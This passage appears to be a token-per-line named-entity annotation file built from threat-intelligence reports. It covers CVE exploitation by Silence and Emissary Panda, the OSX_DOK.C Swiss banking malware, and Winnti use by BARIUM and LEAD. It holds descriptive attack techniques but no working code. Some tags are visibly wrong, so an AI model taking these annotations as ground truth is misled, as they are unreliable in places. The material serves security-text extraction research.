+shown O
+that O
+the O
+attachment O
+contains O
+an O
+exploit S-VULNAME
+for O
+the O
+CVE-2017-11882 B-VULID
+vulnerability S-VULNAME
+. O
+
+The O
+exploit S-VULNAME
+installs O
+Silence’s S-APT
+loader O
+, O
+designed O
+to O
+download O
+backdoors O
+and O
+other O
+malicious O
+programs O
+. O
+
+We O
+believe O
+Emissary B-APT
+Panda E-APT
+exploited O
+a O
+recently O
+patched O
+vulnerability S-VULNAME
+in O
+Microsoft S-IDTY
+SharePoint O
+tracked O
+by O
+CVE-2019-0604 S-VULID
+, O
+which O
+is O
+a O
+remote O
+code O
+execution O
+vulnerability O
+used O
+to O
+compromise O
+the O
+server O
+and O
+eventually O
+install O
+a O
+webshell O
+. O
+
+Of O
+particular O
+note O
+is O
+their O
+use O
+of O
+tools O
+to O
+identify O
+systems O
+vulnerable O
+to O
+CVE-2017-0144 S-VULID
+, O
+which O
+is O
+the O
+same O
+vulnerability O
+exploited O
+by O
+EternalBlue S-ACT
+that O
+is O
+best O
+known O
+for O
+its O
+use O
+in O
+the O
+WannaCry B-ACT
+attacks E-ACT
+of O
+2017 S-TIME
+. O
+
+In O
+addition O
+to O
+the O
+aforementioned O
+post-exploitation O
+tools O
+, O
+the O
+actors O
+used O
+these O
+webshells S-TOOL
+to O
+upload O
+legitimate O
+executables O
+that O
+they O
+would O
+use O
+DLL S-TOOL
+sideloading O
+to O
+run B-ACT
+a I-ACT
+malicious I-ACT
+DLL E-ACT
+that O
+has O
+code O
+overlaps O
+with O
+known O
+Emissary B-APT
+Panda E-APT
+attacks O
+. O
+
+OSX S-OS
+Malware S-MAL
+Linked O
+to O
+Operation O
+Emmental B-ACT
+Hijacks I-ACT
+User I-ACT
+Network I-ACT
+Traffic E-ACT
+. O
+
+The O
+OSX_DOK S-MAL
+malware S-MAL
+( O
+Detected O
+by O
+Trend B-SECTEAM
+Micro E-SECTEAM
+as O
+OSX_DOK.C S-MAL
+) O
+showcases O
+sophisticated O
+features O
+such O
+as O
+certificate O
+abuse O
+and O
+security O
+software O
+evasion O
+that O
+affects O
+machines O
+using O
+Apple B-OS
+’s I-OS
+OS I-OS
+X E-OS
+operating O
+system O
+. O
+
+This O
+malware S-MAL
+, O
+which O
+specifically O
+targets O
+Swiss O
+banking O
+users O
+, O
+uses O
+a O
+phishing B-ACT
+campaign E-ACT
+to O
+drop O
+its O
+payload O
+, O
+which O
+eventually O
+results O
+in O
+the O
+hijacking O
+of O
+a O
+user O
+’s O
+network O
+traffic O
+using O
+a O
+Man-in-the-Middle S-ACT
+( O
+MitM S-ACT
+) O
+attack O
+. O
+
+OSX_DOK.C S-MAL
+seems O
+to O
+be O
+another O
+version O
+of O
+WERDLOD S-MAL
+( O
+Detected O
+by O
+Trend B-SECTEAM
+Micro E-SECTEAM
+as O
+TROJ_WERDLOD B-MAL
+Family E-MAL
+) O
+, O
+which O
+is O
+a O
+malware O
+that O
+was O
+used O
+during O
+the O
+Operation B-ACT
+Emmental E-ACT
+campaigns—an O
+interesting O
+development O
+that O
+we O
+will O
+tackle O
+further O
+in O
+this O
+blog O
+post O
+. O
+
+OSX_DOK.C S-MAL
+first O
+arrives O
+via O
+a O
+phishing B-EMAIL
+email E-EMAIL
+that O
+contains O
+certain O
+files O
+labeled O
+as O
+either O
+.zip O
+or O
+.docx O
+files O
+. O
+
+The O
+sample O
+we O
+analyzed O
+was O
+a O
+purported O
+message O
+from O
+a O
+police O
+inspector O
+in O
+Zurich S-LOC
+allegedly O
+claiming O
+to O
+unsuccessfully O
+contact O
+the O
+recipient O
+. O
+
+The O
+email S-TOOL
+also O
+comes O
+with O
+two O
+files O
+attached O
+claiming O
+to O
+contain O
+questions O
+for O
+the O
+user O
+: O
+one O
+is O
+a O
+.zip O
+file O
+, O
+which O
+is O
+a O
+fake O
+OS B-TOOL
+X I-TOOL
+app E-TOOL
+, O
+while O
+the O
+other O
+is O
+a O
+.docx O
+file O
+used O
+to O
+target O
+Windows S-OS
+operating O
+systems O
+using O
+WERDLOD S-MAL
+. O
+
+Both O
+of O
+these O
+samples O
+work O
+as O
+Banking B-MAL
+Trojans E-MAL
+and O
+provide O
+similar O
+functionalities O
+. O
+
+Some O
+examples O
+of O
+the O
+files O
+used O
+in O
+the O
+email S-TOOL
+attachment O
+include O
+the O
+following O
+: O
+
+Zahlungsinformationen B-FILE
+01.06.2017.zip E-FILE
+. O
+
+Zahlungsinformationen B-FILE
+digitec.zip E-FILE
+. O
+
+Dokument B-FILE
+09.06.2017.zip E-FILE
+. O
+
+Dokument B-FILE
+09.06.2017.docx E-FILE
+. O
+
+06.2017.docx S-FILE
+. O
+
+Once O
+the O
+docx O
+file O
+included O
+in O
+the O
+phishing B-ACT
+email E-ACT
+is O
+clicked O
+, O
+a O
+warning O
+window O
+will O
+pop O
+up O
+. O
+
+After O
+this O
+, O
+the O
+App B-TOOL
+Store E-TOOL
+on O
+the O
+system O
+will O
+be O
+removed O
+, O
+followed O
+by O
+a O
+full O
+screen O
+fake O
+OS B-OS
+X E-OS
+update O
+screen O
+. O
+
+It O
+will O
+ask O
+for O
+a O
+password O
+to O
+run O
+command O
+as O
+root O
+. O
+
+The O
+malware O
+will O
+begin O
+to O
+download O
+other O
+utilities S-TOOL
+. O
+
+It O
+relies O
+on O
+Homebrew S-TOOL
+, O
+an O
+open O
+source O
+software S-TOOL
+package O
+manager O
+to O
+install O
+Golang S-TOOL
+and O
+Tor S-TOOL
+. O
+
+The O
+malware O
+will O
+then O
+install O
+fake O
+certificates O
+in O
+the O
+system O
+to O
+perform O
+a O
+MitM B-ACT
+attack E-ACT
+without O
+notifying O
+the O
+user O
+. O
+
+The O
+structure O
+of O
+the O
+fake O
+App B-TOOL
+Store E-TOOL
+matches O
+the O
+application O
+bundle O
+structure O
+and O
+provides O
+both O
+English S-LOC
+and O
+German S-LOC
+interfaces O
+. O
+
+The O
+archive O
+in O
+Mac B-OS
+OS I-OS
+X E-OS
+looks O
+like O
+this O
+: O
+
+Mac B-OS
+OS I-OS
+X E-OS
+will O
+run O
+the O
+application O
+if O
+it O
+passes O
+certificates O
+. O
+
+In O
+this O
+case O
+, O
+the O
+malware O
+is O
+signed O
+off O
+by O
+a O
+“ O
+developer O
+” O
+, O
+which O
+may O
+actually O
+be O
+a O
+dummy O
+account O
+or O
+that O
+of O
+a O
+compromised O
+user O
+. O
+
+In O
+addition O
+, O
+the O
+time S-TIME
+stamp O
+on O
+the O
+CA S-IDTY
+is O
+new O
+, O
+which O
+might O
+mean O
+that O
+it O
+was O
+obtained O
+specifically O
+for O
+this O
+attack O
+. O
+
+The O
+fake O
+certificate O
+imitates O
+the O
+COMODO S-IDTY
+root O
+certificate O
+. O
+
+Take O
+note O
+that O
+the O
+fake O
+certificate O
+does O
+not O
+contain O
+a O
+COMODO B-IDTY
+Certificate I-IDTY
+Authority E-IDTY
+seal O
+that O
+certifies O
+its O
+validity O
+, O
+as O
+seen O
+in O
+the O
+comparison O
+below O
+: O
+
+We O
+noticed O
+that O
+this O
+malware O
+will O
+not O
+work O
+for O
+Mozilla B-TOOL
+Firefox E-TOOL
+or O
+Google B-TOOL
+Chrome E-TOOL
+since O
+these O
+two O
+browsers S-TOOL
+have O
+their O
+own O
+root O
+certificates O
+. O
+
+Of O
+all O
+the O
+major O
+browsers S-TOOL
+, O
+only O
+Safari S-TOOL
+uses O
+the O
+system O
+’s O
+certificates O
+. O
+
+We O
+observed O
+the O
+attacker O
+targeting O
+both O
+Windows S-OS
+and O
+Mac B-OS
+OS I-OS
+X E-OS
+in O
+the O
+same O
+spam O
+mail O
+on O
+June B-TIME
+9 I-TIME
+, I-TIME
+2017 E-TIME
+. O
+
+There O
+is O
+a O
+file O
+shortcut O
+embedded O
+in O
+the O
+malicious O
+.docx S-FILE
+file—one O
+that O
+will O
+download O
+an O
+executable O
+file O
+from O
+Dropbox S-TOOL
+that O
+executes O
+once O
+clicked O
+by O
+the O
+user O
+. O
+
+The O
+functionalities O
+are O
+similar O
+to O
+the O
+malicious B-MAL
+app E-MAL
+provided O
+, O
+which O
+includes O
+installing O
+tor S-TOOL
+and O
+proxy S-TOOL
+. O
+
+We O
+have O
+already O
+notified O
+Dropbox S-TOOL
+about O
+the O
+use O
+of O
+its O
+service O
+for O
+this O
+malware O
+. O
+
+Dropbox S-TOOL
+has O
+already O
+taken O
+down O
+the O
+links O
+. O
+
+The O
+malware O
+will O
+install O
+two O
+proxies S-TOOL
+running O
+on O
+local O
+host O
+port O
+5555 O
+and O
+5588 O
+. O
+
+All O
+of O
+the O
+traffic O
+will O
+be O
+hijacked O
+into O
+the O
+first O
+proxy O
+( O
+port O
+5555 O
+) O
+with O
+the O
+victim O
+’s O
+external O
+IP O
+address O
+as O
+parameter O
+. O
+
+The O
+first O
+( O
+port O
+5555 O
+) O
+proxy O
+first O
+finds O
+the O
+IP O
+parameter O
+. O
+
+If O
+it O
+is O
+not O
+in O
+Switzerland S-LOC
+, O
+the O
+traffic O
+will O
+proceed O
+as O
+normal O
+. O
+
+If O
+it O
+detects O
+an O
+IP S-IP
+located O
+in O
+Switzerland S-LOC
+, O
+the O
+malware B-MAL
+will E-MAL
+run O
+an O
+obfuscated O
+JavaScript O
+code O
+and O
+find O
+its O
+visiting O
+domain O
+. O
+
+If O
+the O
+domain O
+is O
+in O
+the O
+target O
+, O
+the O
+malware O
+will O
+perform O
+a O
+MitM B-ACT
+attack E-ACT
+and O
+redirect O
+the O
+traffic O
+to O
+the O
+second O
+proxy O
+( O
+port O
+5588 O
+) O
+, O
+which O
+routes O
+the O
+traffic O
+to O
+the O
+Tor O
+network O
+. O
+
+The O
+purpose O
+of O
+these O
+steps O
+is O
+to O
+target O
+users O
+in O
+Switzerland S-LOC
+and O
+hijack O
+their O
+traffic O
+After O
+deobfuscating O
+the O
+malware O
+, O
+we O
+found O
+the O
+target O
+domains O
+: O
+
+The O
+target O
+domain O
+’s O
+visitors O
+will O
+be O
+redirected O
+into O
+an O
+e-banking O
+login O
+page O
+that O
+looks O
+and O
+acts O
+normally O
+, O
+but O
+is O
+located O
+on O
+dark O
+web O
+sites O
+. O
+
+However O
+, O
+once O
+the O
+victim O
+enters O
+an O
+account O
+and O
+password O
+. O
+
+A O
+window O
+will O
+pop O
+out O
+. O
+
+The O
+pop-out O
+window O
+is O
+just O
+smoke O
+and O
+mirrors O
+, O
+where O
+nothing O
+actually O
+happens O
+once O
+the O
+countdown O
+timer O
+reaches O
+zero O
+. O
+
+We O
+analyzed O
+the O
+webpage O
+and O
+found O
+attackers O
+injecting O
+a O
+script O
+into O
+the O
+webpage O
+. O
+
+Once O
+the O
+user O
+enters O
+an O
+account O
+and O
+password O
+, O
+it O
+will O
+initiate O
+POST O
+using O
+AJAX O
+. O
+
+The O
+POST O
+message O
+is O
+sent O
+to O
+the O
+same O
+site O
+as O
+the O
+fake O
+login O
+page—which O
+an O
+attacker O
+can O
+control O
+inside O
+the O
+Tor O
+network O
+. O
+
+We O
+decoded O
+the O
+data O
+section O
+and O
+found O
+not O
+only O
+the O
+account O
+and O
+password O
+, O
+but O
+that O
+it O
+also O
+fingerprinted O
+the O
+user O
+’s O
+browser O
+and O
+system O
+information O
+. O
+
+While O
+Operation B-ACT
+Emmental E-ACT
+was O
+able O
+to O
+bypass O
+two-way O
+authentication O
+by O
+tricking O
+its O
+victims O
+into O
+installing O
+a O
+fake B-TOOL
+app E-TOOL
+, O
+we O
+have O
+not O
+observed O
+OSX_DOK.C S-MAL
+doing O
+this O
+. O
+
+However O
+, O
+since O
+they O
+can O
+inject O
+code O
+into O
+the O
+webpage O
+, O
+it O
+means O
+they O
+have O
+the O
+ability O
+to O
+do O
+this O
+as O
+well O
+. O
+
+We O
+performed O
+static O
+analysis O
+on O
+the O
+sample O
+and O
+found O
+it O
+packed O
+by O
+Ultimate B-TOOL
+Packer E-TOOL
+for O
+Executables S-TOOL
+( O
+UPX O
+) O
+, O
+an O
+open O
+source O
+executable O
+packer O
+that O
+can O
+often O
+be O
+abused O
+by O
+malware S-MAL
+. O
+
+We O
+successfully O
+unpacked O
+the O
+initial O
+sample O
+we O
+found O
+dropped O
+by O
+the O
+UPX B-TOOL
+unpacker E-TOOL
+. O
+
+The O
+malware S-MAL
+is O
+not O
+obfuscated O
+so O
+we O
+easily O
+found O
+interesting O
+strings O
+here O
+. O
+
+We O
+can O
+see O
+that O
+the O
+malware S-MAL
+relies O
+on O
+bash O
+shell O
+for O
+most O
+of O
+its O
+setup O
+. O
+
+We O
+were O
+not O
+able O
+to O
+unpack O
+the O
+sample O
+discovered O
+after O
+June B-TIME
+9 I-TIME
+, I-TIME
+2017 E-TIME
+. O
+
+The O
+UPX S-TOOL
+gave O
+a O
+warning O
+message O
+about O
+memory O
+buffer O
+overflow O
+. O
+
+The O
+malware S-MAL
+author O
+seemingly O
+made O
+unpacking O
+the O
+malware O
+more O
+difficult O
+to O
+slow O
+down O
+or O
+even O
+evade O
+the O
+antivirus O
+engine O
+’s O
+scanning O
+process O
+. O
+
+The O
+packer O
+is O
+the O
+same O
+but O
+the O
+malware O
+tries O
+to O
+exploit O
+the O
+undiscovered O
+bug O
+in O
+the O
+UPX S-TOOL
+library O
+that O
+causes O
+unpack O
+failure O
+. O
+
+We O
+have O
+reported O
+the O
+issues O
+to O
+the O
+UPX S-TOOL
+team O
+, O
+and O
+they O
+have O
+already O
+fixed O
+it O
+. O
+
+The O
+impacted O
+versions O
+of O
+the O
+UPX S-TOOL
+library O
+are O
+3.94 O
+, O
+3.93 O
+, O
+and O
+3.92 O
+. O
+
+This O
+technique O
+enables O
+the O
+malware O
+to O
+efficiently O
+run O
+while O
+evading O
+unpacking O
+techniques O
+from O
+the O
+AntiVirus-integrated O
+UPX O
+library O
+. O
+
+As O
+mentioned O
+earlier O
+, O
+we O
+believe O
+that O
+OSX_DOK.C S-MAL
+might O
+be O
+the O
+MAC S-OS
+OS O
+X O
+version O
+of O
+WERDLOD S-MAL
+, O
+an O
+online O
+banking O
+malware S-MAL
+that O
+used O
+the O
+same O
+techniques O
+as O
+Operation B-TOOL
+Emmental E-TOOL
+. O
+
+Other O
+research O
+have O
+also O
+connected O
+the O
+OSX S-OS
+malware O
+and O
+Retefe O
+( O
+the O
+external O
+term O
+used O
+for O
+WERDLOD S-MAL
+) O
+via O
+similarities O
+in O
+their O
+behavior O
+. O
+
+While O
+OSX_DOK.C S-MAL
+is O
+designed O
+for O
+MAC S-OS B-TOOL
+OS I-TOOL
+X E-TOOL
+, O
+which O
+is O
+a O
+Unix-like O
+system O
+, O
+WERDLOD S-MAL
+is O
+designed O
+for O
+Windows S-OS
+. O
+
+But O
+in O
+terms O
+of O
+features O
+and O
+behaviors O
+, O
+these O
+two O
+malware O
+are O
+very O
+similar O
+. O
+
+Here O
+is O
+a O
+list O
+of O
+their O
+similarities O
+. O
+
+Both O
+malware O
+kill O
+all O
+current O
+browsers O
+before O
+installing O
+fake O
+certificates O
+: O
+
+Both O
+WERDLOD S-MAL
+and O
+OSX_DOK.C S-MAL
+are O
+designed O
+to O
+kill O
+the O
+browser O
+process O
+before O
+installing O
+fake O
+certificates O
+. O
+
+While O
+WERDLOD S-MAL
+kills O
+processes O
+for O
+Internet B-TOOL
+Explorer E-TOOL
+, O
+Firefox S-TOOL
+, O
+and O
+Chrome S-TOOL
+, O
+OSX_DOK.C S-MAL
+does O
+the O
+same O
+on O
+Safari S-TOOL
+, O
+Firefox S-TOOL
+, O
+and O
+Chrome S-TOOL
+. O
+
+Both O
+malware S-MAL
+share O
+the O
+same O
+proxy O
+settings O
+and O
+script O
+: O
+
+While O
+WERDLOD S-MAL
+and O
+OSX_DOK.C S-MAL
+use O
+different O
+codes O
+( O
+since O
+they O
+target O
+different O
+operating O
+systems O
+) O
+, O
+they O
+have O
+similar O
+proxy O
+settings O
+and O
+script O
+formats O
+. O
+
+In O
+particular O
+, O
+WERDLOD S-MAL
+uses O
+scripts O
+running O
+on O
+http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} S-URL
+as O
+proxy O
+: O
+
+Comparing O
+it O
+to O
+OSX_DOK.C S-MAL
+, O
+we O
+can O
+see O
+that O
+it O
+uses O
+the O
+same O
+script O
+format O
+. O
+
+Both O
+malware S-MAL
+have O
+similar O
+targets O
+. O
+
+Both O
+WERDLOD S-MAL
+and O
+OSX_DOK.C S-MAL
+targeted O
+financial O
+institutions O
+, O
+with O
+a O
+particular O
+focus O
+on O
+banks O
+in O
+Switzerland S-LOC
+. O
+
+Further O
+analysis O
+of O
+both O
+malware S-MAL
+revealed O
+that O
+their O
+main O
+targets O
+are O
+very O
+similar O
+, O
+as O
+seen O
+in O
+the O
+screenshot O
+below O
+. O
+
+While O
+it O
+’s O
+possible O
+that O
+this O
+is O
+a O
+coincidence O
+, O
+the O
+rest O
+of O
+the O
+evidence O
+makes O
+it O
+unlikely O
+for O
+these O
+two O
+malware S-MAL
+to O
+target O
+the O
+same O
+organizations O
+by O
+chance O
+. O
+
+Given O
+the O
+connection O
+between O
+WERDLOD S-MAL
+and O
+OSX_DOK.C S-MAL
+, O
+it O
+is O
+reasonable O
+to O
+assume O
+that O
+the O
+latter O
+is O
+also O
+a O
+part O
+of O
+the O
+Operational B-ACT
+Emmental E-ACT
+campaign O
+. O
+
+To O
+further O
+illustrate O
+, O
+here O
+is O
+a O
+timeline O
+of O
+Operation B-ACT
+Emmental E-ACT
+and O
+its O
+potential O
+relationship O
+to O
+OSX_DOK.C S-MAL
+: O
+
+Despite O
+phishing E-ACT
+incidents O
+for O
+Mac S-OS
+devices O
+being O
+rarer O
+than O
+their O
+Windows S-OS
+counterparts O
+, O
+users O
+should O
+still O
+be O
+aware O
+that O
+attackers O
+can O
+target O
+them O
+at O
+any O
+moment O
+. O
+
+By O
+implementing O
+best O
+practices O
+for O
+phishing-type O
+attacks—such O
+as O
+refraining O
+from O
+downloading O
+files O
+unless O
+they O
+are O
+absolutely O
+certain O
+that O
+they O
+come O
+from O
+trustworthy O
+sources—users O
+can O
+avoid O
+being O
+victimized O
+by O
+malware O
+such O
+as O
+OSX_DOK.C S-MAL
+that O
+prey O
+on O
+users O
+who O
+lack O
+awareness O
+of O
+phishing E-ACT
+strategies O
+. O
+
+In O
+addition O
+, O
+end O
+users O
+can O
+also O
+benefit O
+from O
+security O
+solutions O
+such O
+as O
+Trend B-SECTEAM
+Micro I-SECTEAM
+Home I-SECTEAM
+Security E-SECTEAM
+for O
+Mac S-OS
+, O
+which O
+provides O
+comprehensive O
+security O
+and O
+multi-device O
+protection O
+against O
+viruses S-MAL
+, O
+ransomware S-MAL
+, O
+malicious B-MAL
+websites E-MAL
+, O
+and O
+identity B-MAL
+thieves E-MAL
+. O
+
+It S-SECTEAM
+also O
+provides O
+secure O
+storage O
+of O
+passwords O
+and O
+other O
+sensitive O
+information O
+. O
+
+Trend B-SECTEAM
+Micro™ I-SECTEAM
+Mobile I-SECTEAM
+Security E-SECTEAM
+for O
+Apple B-TOOL
+devices E-TOOL
+( O
+available O
+on O
+the O
+App B-TOOL
+Store E-TOOL
+) O
+can O
+monitor O
+and O
+block O
+phishing E-ACT
+attacks O
+and O
+other O
+malicious O
+URLs S-URL
+. O
+
+For O
+enterprises O
+, O
+Trend B-SECTEAM
+Micro I-SECTEAM
+’s I-SECTEAM
+Smart I-SECTEAM
+Protection I-SECTEAM
+Suites E-SECTEAM
+with O
+XGen™ B-SECTEAM
+security E-SECTEAM
+, O
+which O
+support O
+Mac S-TOOL
+systems O
+, O
+infuse O
+high-fidelity O
+machine O
+learning O
+into O
+a O
+blend O
+of O
+threat O
+protection O
+techniques O
+to O
+eliminate O
+security O
+gaps O
+across O
+any O
+user O
+activity O
+and O
+any O
+endpoint O
+. O
+
+Detecting O
+threat O
+actors O
+in O
+recent O
+German S-LOC
+industrial O
+attacks O
+with O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+. O
+
+When O
+a O
+Germany-based O
+industrial B-IDTY
+conglomerate E-IDTY
+disclosed O
+in O
+December B-TIME
+2016 E-TIME
+that O
+it O
+was O
+breached O
+early O
+that O
+year O
+, O
+the O
+breach O
+was O
+revealed O
+to O
+be O
+a O
+professionally O
+run O
+industrial O
+espionage O
+attack O
+. O
+
+According O
+to O
+the O
+German S-LOC
+press O
+, O
+the O
+intruders O
+used O
+the O
+Winnti S-MAL
+family O
+of O
+malware O
+as O
+their O
+main O
+implant O
+, O
+giving O
+them O
+persistent O
+access O
+to O
+the O
+conglomerate O
+’s O
+network O
+as O
+early O
+as O
+February B-TIME
+2016 E-TIME
+. O
+
+In O
+this O
+blog O
+, O
+we O
+look O
+at O
+the O
+Winnti S-MAL
+malware O
+implant O
+as O
+used O
+by O
+two O
+known O
+activity O
+groups O
+BARIUM S-APT
+and O
+LEAD S-APT
+. O
+
+We O
+look O
+at O
+how O
+these O
+activity O
+groups O
+introduce O
+the O
+implant O
+to O
+various O
+targets O
+and O
+techniques O
+used O
+by O
+Microsoft S-IDTY
+researchers O
+to O
+track O
+the O
+implant O
+. O
+
+To O
+show O
+how O
+this O
+breach O
+and O
+similar O
+breaches O
+can O
+be O
+mitigated O
+, O
+we O
+look O
+at O
+how O
+Windows B-TOOL
+Defender I-TOOL
+Advanced I-TOOL
+Threat I-TOOL
+Protection E-TOOL
+( O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+) O
+flags O
+activities O
+associated O
+with O
+BARIUM S-APT
+, O
+LEAD S-APT
+, O
+and O
+other O
+known O
+activity O
+groups O
+and O
+how O
+it O
+provides O
+extensive O
+threat O
+intelligence O
+about O
+these O
+groups O
+. O
+
+We O
+go O
+through O
+the O
+Winnti S-MAL
+implant O
+installation O
+process O
+and O
+explore O
+how O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+can O
+capture O
+such O
+attacker O
+methods O
+and O
+tools O
+and O
+provide O
+visualized O
+contextual O
+information O
+that O
+can O
+aid O
+in O
+actual O
+attack O
+investigation O
+and O
+response O
+. O
+
+We O
+then O
+discuss O
+how O
+centralized B-TOOL
+response I-TOOL
+options E-TOOL
+, O
+provided O
+as O
+enhancements O
+to O
+Windows B-TOOL
+Defender I-TOOL
+ATP E-TOOL
+with O
+the B-OS
+Windows I-OS
+10 I-OS
+Creators I-OS
+Update E-OS
+, O
+can O
+be O
+used O
+to O
+quickly O
+stop O
+threats O
+, O
+including O
+stopping O
+command O
+and O
+control O
+( O
+C&C S-PROT
+) O
+communication O
+and O
+preventing O
+existing O
+implants O
+from O
+installing O
+additional O
+components O
+or O
+from O
+moving O
+laterally O
+to O
+other O
+computers O
+on O
+the O
+network O
+. O
+
+Microsoft B-SECTEAM
+Threat I-SECTEAM
+Intelligence E-SECTEAM
+associates O
+Winnti S-MAL
+with O
+multiple O
+activity O
+groups—collections O
+of O
+malware O
+, O
+supporting O
+infrastructure O
+, O
+online O
+personas O
+, O
+victimology O
+, O
+and O
+other O
+attack O
+artifacts O
+that O
+the O
+Microsoft B-SECTEAM
+intelligent I-SECTEAM
+security I-SECTEAM
+graph E-SECTEAM
+uses O
+to O
+categorize O
+and O
+attribute O
+threat O
+activity O
+. O
+
+Microsoft S-IDTY
+labels O
+activity O
+groups O
+using O
+code O
+names O
+derived O
+from O
+elements O
+in O
+the O
+periodic O
+table O
+. O
+
+In O
+the O
+case O
+of O
+this O
+malware O
+, O
+the O
+activity O
+groups O
+strongly O
+associated O
+with O
+Winnti S-MAL
+are O
+BARIUM S-APT
+and O
+LEAD S-APT
+. O
+
+But O
+even O
+though O
+they O
+share O
+the O
+use O
+of O
+Winnti S-MAL
+, O
+the O
+BARIUM S-APT
+and O
+LEAD S-APT
+activity O
+groups O
+are O
+involved O
+in O
+very O
+different O
+intrusion O
+scenarios O
+. O
+
+BARIUM S-APT
+begins O
+its O
+attacks O
+by O
+cultivating O
+relationships O
+with O
+potential O
+victims—particularly O
+those O
+working O
+in O
+Business O
+Development O
+or O
+Human O
+Resources—on O
+various O
+social B-TOOL
+media I-TOOL
+platforms E-TOOL
+. O
+
+Once O
+BARIUM S-APT
+has O
+established O
+rapport O
+, O
+they O
+spear-phish O
+the O
+victim O
+using O
+a O
+variety O
+of O
+unsophisticated O
+malware O
+installation O
+vectors O
+, O
+including O
+malicious B-TOOL
+shortcut E-TOOL
+( O
+.lnk S-FILE
+) O
+files O
+with O
+hidden O
+payloads O
+, O
+compiled B-TOOL
+HTML E-TOOL
+help O
+( O
+.chm S-FILE
+) O
+files E-TOOL
+, O
+or O
+Microsoft B-TOOL
+Office I-TOOL
+documents E-TOOL
+containing O
+macros O
+or O
+exploits O
+. O
+
+Initial O
+intrusion O
+stages O
+feature O
+the O
+Win32/Barlaiy S-MAL
+implant—notable O
+for O
+its O
+use O
+of O
+social B-TOOL
+network I-TOOL
+profiles E-TOOL
+, O
+collaborative B-TOOL
+document I-TOOL
+editing I-TOOL
+sites E-TOOL
+, O
+and O
+blogs S-TOOL
+for O
+C&C S-PROT
+. O
+
+Later O
+stages O
+of O
+the O
+intrusions O
+rely O
+upon O
+Winnti S-MAL
+for O
+persistent O
+access O
+. O
+
+The O
+majority O
+of O
+victims O
+recorded O
+to O
+date O
+have O
+been O
+in O
+electronic O
+gaming O
+, O
+multimedia O
+, O
+and O
+Internet O
+content O
+industries O
+, O
+although O
+occasional O
+intrusions O
+against O
+technology B-IDTY
+companies E-IDTY
+have O
+occurred O
+. O
+
+In O
+contrast O
+, O
+LEAD S-APT
+has O
+established O
+a O
+far O
+greater O
+reputation O
+for O
+industrial O
+espionage O
+. O
+
+In O
+the O
+past O
+few O
+years O
+, O
+LEAD S-APT
+’s O
+victims O
+have O
+included O
+: O
+
+Multinational S-IDTY
+, O
+multi-industry B-IDTY
+companies I-IDTY
+involved I-IDTY
+in I-IDTY
+the I-IDTY
+manufacture I-IDTY
+of I-IDTY
+textiles E-IDTY
+, O
+chemicals S-IDTY
+, O
+and O
+electronics S-IDTY
+. O
+
+Pharmaceutical B-IDTY
+companies E-IDTY
+. O
+
+A B-IDTY
+company I-IDTY
+in I-IDTY
+the I-IDTY
+chemical I-IDTY
+industry E-IDTY
+. O
+
+University O
+faculty O
+specializing O
+in O
+aeronautical O
+engineering O
+and O
+research O
+. O
+
+A B-IDTY
+company I-IDTY
+involved I-IDTY
+in I-IDTY
+the I-IDTY
+design I-IDTY
+and I-IDTY
+manufacture I-IDTY
+of I-IDTY
+motor I-IDTY
+vehicles E-IDTY
+. O
+
+A B-IDTY
+cybersecurity I-IDTY
+company I-IDTY
+focusing I-IDTY
+on I-IDTY
+protecting I-IDTY
+industrial I-IDTY
+control I-IDTY
+systems E-IDTY
+. O
+
+During O
+these O
+intrusions O
+, O
+LEAD S-APT
+’s O
+objective O
+was O
+to O
+steal O
+sensitive O
+data O
+, O
+including O
+research O
+materials O
+, O
+process O
+documents O
+, O
+and O
+project O
+plans O
+. O
+
+LEAD S-APT
+also O
+steals O
+code-signing O
+certificates O
+to O
+sign O
+its O
+malware O
+in O
+subsequent O
+attacks O
+. O
+
+In O
+most O
+cases O
+, O
+LEAD S-APT
+’s O
+attacks O
+do O
+not O
+feature O
+any O
+advanced O
+exploit O
+techniques O
+. O
+
+The O
+group O
+also O
+does O
+not O
+make O
+special O
+effort O
+to O
+cultivate O
+victims O
+prior O
+to O
+an O
+attack O
+. O
+
+Instead O
+, O
+the O
+group O
+often O
+simply O
+emails S-TOOL
+a O
+Winnti B-TOOL
+installer E-TOOL
+to O
+potential O
+victims O
+, O
+relying O
+on O
+basic O
+social O
+engineering O
+tactics O
+to O
+convince O
+recipients O
+to O
+run O
+the O
+attached O
+malware O
+. O
+
+In O
+some O
+other O
+cases O
+, O
+LEAD S-APT
+gains O
+access O
+to O
+a O
+target O
+by O
+brute-forcing O
+remote B-TOOL
+access I-TOOL
+login I-TOOL
+credentials E-TOOL
+, O
+performing O
+SQL B-TOOL
+injection E-TOOL
+, O
+or O
+exploiting O
+unpatched O
+web B-TOOL
+servers E-TOOL
+, O
+and O
+then O
+they O
+copy O
+the O
+Winnti S-MAL
+installer O
+directly O
+to O
+compromised O
+machines O
+. O
+
+Microsoft B-SECTEAM
+Analytics E-SECTEAM
+shows O
+that O
+Winnti S-MAL
+has O
+been O
+used O
+in O
+intrusions O
+carried O
+out O
+throughout O
+Asia S-LOC
+, O
+Europe S-LOC
+, O
+Oceania S-LOC
+, O
+the B-LOC
+Middle I-LOC
+East E-LOC
+, O
+and O
+the B-LOC
+United I-LOC
+States E-LOC
+in O
+the O
+last B-TIME
+six I-TIME
+months E-TIME
+. O
+
+The O
+most O
+recent O
+series O
+of O
+attacks O
+observed O
+was O
+in O
+December B-TIME
+2016 E-TIME
+. O
+
+Although O
+tracking O
+threats O
+like O
+Winnti S-MAL
+involves O
+old-fashioned O
+investigative O
+work O
+, O
+Microsoft O
+Threat O
+Intelligence O
+analysts O
+take O
+advantage O
+of O
+machine B-TOOL
+learning E-TOOL
+to O
+work O
+at O
+scale O
+. O
+
+When O
+attackers O
+used O
+Winnti S-MAL
+to O
+maintain O
+access O
+to O
+web O
+servers O
+, O
+they O
+hid O
+the O
+implant O
+in O
+plain O
+sight O
+by O
+masquerading O
+it O
+as O
+a O
+trusted O
+, O
+legitimate O
+file O
+. O
+
+This O
+was O
+the O
+case O
+in O
+two O
+known O
+intrusions O
+in O
+2015 S-TIME
+, O
+where O
+attackers O
+named O
+the O
+implant O
+DLL S-TOOL
+“ O
+ASPNET_FILTER.DLL S-FILE
+” O
+to O
+disguise O
+it O
+as O
+the O
+DLL S-TOOL
+for O
+the O
+ASP.NET S-FILE
+ISAPI O
+Filter O
+. O
+
+Although O
+there O
+are O
+obvious O
+differences O
+between O
+the O
+legitimate O
+file O
+and O
+the O
